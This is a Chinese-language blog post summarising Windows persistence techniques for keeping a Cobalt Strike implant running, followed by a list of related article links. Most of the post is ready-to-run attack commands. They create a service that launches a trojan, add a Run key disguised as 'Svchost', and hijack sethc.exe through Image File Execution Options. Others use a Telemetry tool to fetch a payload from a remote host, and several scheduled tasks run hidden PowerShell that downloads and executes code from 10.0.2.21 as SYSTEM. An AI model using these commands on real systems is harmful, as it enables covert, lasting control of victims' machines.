Windows权限维持总结
windows权限维持
注册服务
sc create 服务名 binpath= "cmd.exe /k 木马路径" start="auto" obj="LocalSystem"
sc start 服务名
在这里可以使用Cobaltstrike“梼杌”脚本进行创建
我这里存在一个问题,我的实验环境是纯净的windows server 2012,我在该其创建了名为“WindowsUpdate“的服务并把目标指向了我cs木马,执行该命令的权限是administrator权限,创建服务时爆出的错误为”服务没有及时响应启动或控制请求“,但我查看目标发现服务已经创建成功了,且在我没开启前就自动上线,之后我用sc.exe去启动这个服务名也是爆上诉错误,且也成功上线,但我查看目标机器发现WindowsUpdate服务并没有启动,一直没找到原因,特向各位大佬请教,已下是我的操作步骤。
如图该服务已创建且执行,但这里爆出了”服务没有相映控制功能“,查看试验机,服务并没有开启,但可以看到木马进程。
服务器管理爆红,开头猜测是防火墙问题,但关闭防火墙,且杀掉进程重启了计算器,服务在没开启的情况下还是自动上线了cs。
注册表添加启动项
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Svchost /t REG_SZ /d "C:\Users\Administrator\Desktop\artifact " /f
启动项已添加,重启cs上线,没问题。
映像劫持
原理:映像劫持和dll劫持都是差不多的,都是通过劫持一个程序运行另一个程序,简称偷梁换柱。
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Sethc.exe" /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Sethc.exe" /v Debugger /t REG_SZ /d "C:\Users\Administrator\Desktop\artifact.exe " /f
shell sethc.exe
sethc.exe是劫持的程序,可以自己更换,上线方式就是运行该exe,即会上线cs马。
更多用法可以参考:https://www.anquanke.com/post/id/151425
DLL劫持
可以参考我之前的文章--《D盾dll劫持利用》
https://www.cnblogs.com/Secde0/articles/13862714.html
Microsoft Compatibility Telemetry 微软兼容性遥测服务
介绍:CompatTelRunner.exe是用户可以在Windows CompatibilityTelemetry服务下运行的进程,它通常位于C:\ \Windows \System32目录中。它负责收集有关计算机及其性能的各种技术数据,并将其发送给Microsoft进行Windows客户体验改善计划以及用于Windows操作系统的升级过程中。该进程使用了CPU的极高百分比来进行文件扫描,然后通过Internet连接传输数据。因此,用户还会遇到互联网连接速度较慢甚至系统崩溃的情况。
- 使用条件
- 管理员权限,并且可以写入HKLM(HKEY_LOCAL_MACHINE)
- 机器必须出网
- 存在CompatTelRunner.exe
- 2008R2 / Windows 7至2019 / Windows 10
exp:
Telemetry.exe install /command:calc
Telemetry.exe install /url:http://vps:8089/System.exe
参考:
https://my.oschina.net/u/4579293/blog/4476633
https://github.com/zhouzu/Telemetry
计划任务
使用之前隐藏后门文件位置,添加完计划任务隐藏计划任务
#(X64) - On System Start
schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onstart /ru System
#(X64) - On User Idle (30mins)
schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onidle /i 30
#(X86) - On User Login
schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onlogon /ru System
#(X86) - On System Start
schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onstart /ru System
#(X86) - On User Idle (30mins)
schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onidle /i 30
https://blog.csdn.net/qq_23936389/article/details/102950219
https://yq.aliyun.com/articles/479093
远程桌面
在出网的条件下可以使用诸如向日葵、teamview等远程软件,还可以把这些软件加入后门,如果有其他红军人员使用可以趁虚而入。
附加
个人认为总结较全的文章
Windows权限维持总结的更多相关文章
- [ Windows BAT Script ] BAT 脚本获取windows权限
BAT 脚本获取windows权限 @echo off echo I am trying to run as Administrator %1 %2 ver|find "5."&g ...
- 有关于一次windows权限方面的一次学习
由于最近需要使用windows的Local Group Policy的API,重新梳理一些有关windows权限的只是,这样需要理解一些关键概念,这些概念之间的关联联系形成了一张网络图.必须理解才能真 ...
- windows权限错误
1.installer "内部错误 2203 C:\WINDOWS\Installer\354787.ipi,-2147287035” 用户的local\Temp目录没有system权限 2 ...
- Windows权限提升基础知识和命令
介绍 这篇文章是介绍window的权限提升,虽然不是一个全面的指南,但会试图覆盖主要的技术,常用的资源列表在文章底部,可供大家参考. window权限提升基础知识 初始信息收集 在开始提权之前,我们需 ...
- Windows权限维持
前言 最近终于不是那么忙了,有时间静下心来学点知识,这篇文章自起稿到发布,用时近三周,其中有近一周的时间在迷茫在焦躁,甚至怀疑.否定自己.网上的表哥们个顶个儿的优秀,于是就给自己很大的压力,所以那一个 ...
- python 添加Windows权限
# -*- coding: utf-8 -*- """ Created on Mon Jan 8 09:09:51 2018 @author: coordinate &q ...
- CVE-2018-8120 Windows权限提升
来源 : bigric3/cve-2018-8120 Detail : cve-2018-8120-analysis-and-exploit 演示图 下载 CVE-2018-8120.zip
- WINDOWS权限大牛们,请进
大家好, 我遇到一个问题,我的一台windows7去访问另一个电脑的共享,输入账号密码后,老是说密码不正确.而其他电脑去访问共享,密码账号密码后都OK 我想知道原因是什么?
- Linux上mount 挂载windows共享文件权限问题
在服务器部署的时候需要把文件夹设置在windows的共享文件上.在使用mount命令挂载到linux上后.文件路径和文件都是可以访问,但是不能写入,导致系统在上传文件的时候提示“权限不够,没有写权限” ...
随机推荐
- 【lora无线数传通信模块】亿佰特E22串口模块用于物联网地震预警传感通信方案
物联网地震预警项目介绍: 地震,俗称地动.它像平常的刮风下雨一样,是一种常见的自然现象,是地壳运动的一种表现,即地球内部缓慢积累的能量突然释放而引起的地球表层的振动.据统计,5级以上地震就能够造成破坏 ...
- .NET C#基础(6):命名空间 - 有名字的作用域
0. 文章目的 面向C#新学者,介绍命名空间(namespace)的概念以及C#中的命名空间的相关内容. 1. 阅读基础 理解C与C#语言的基础语法. 理解作用域概念. 2. 名称冲突与命 ...
- Elasticsearch 在地理信息空间索引的探索和演进
vivo 互联网服务器团队- Shuai Guangying 本文梳理了Elasticsearch对于数值索引实现方案的升级和优化思考,从2015年至今数值索引的方案经历了多个版本的迭代,实现思路从最 ...
- docker删除镜像报错 Error response from daemon: conflict: unable to delete f73fe6298efc (cannot be forced) - image has dependent child images
方法1 docker rmi 镜像ID 方法2 docker rmi -f 镜像ID 方法3 docker rmi 镜像仓库名:tag
- CesiumJS 2022^ 源码解读[7] - 3DTiles 的请求、加载处理流程解析
目录 1. 3DTiles 数据集的类型 2. 创建瓦片树 2.1. 请求入口文件 2.2. 创建树结构 2.3. 瓦片缓存机制带来的能力 3. 瓦片树的遍历更新 3.1. 三个大步骤 3.2. 遍历 ...
- 【cartogarpher_ros】一: ros系统下的快速安装
Cartographer是一个跨多个平台和传感器配置提供 2D 和 3D实时同步定位和映射 ( SLAM ) 的系统. 使用Cartographer有Ros集成环境和无Ros环境,对于新手快速入门,推 ...
- CSS进阶内容—盒子和阴影详解
CSS进阶内容 在学习了CSS基本知识之后,我们需要进一步了解CSS,因此写下了这篇文章 当然如果没有学习之前的知识,可以到我的主页中查看之前的文章:秋落雨微凉 - 博客园 CSS三大特性 首先我们先 ...
- Fleet 使用感受
1. 前言 笔者主要使用的编程语言是 Java.平时使用的 IDE 是 JetBrains 公司的 IntelliJ IDEA.有时候也会打开该公司旗下的 PyCharm.DataGrip.WebSt ...
- Ubuntu 隐藏所有窗口快捷键不生效问题
在绑定界面卡住时,切换到一个tty窗口,再切回来 gsettings reset-recursively org.gnome.settings-daemon.plugins.media-keys gs ...
- word段落前的小点·
原因是因为修改论文时,要求在论文的标题前加上 '·' 类似: 在网上搜索了半天,都是加符号,特此记录 解决: 1.文件---选项---显示--勾选段落标记 2.修改样式 至此,设置完毕,章节前的小点已 ...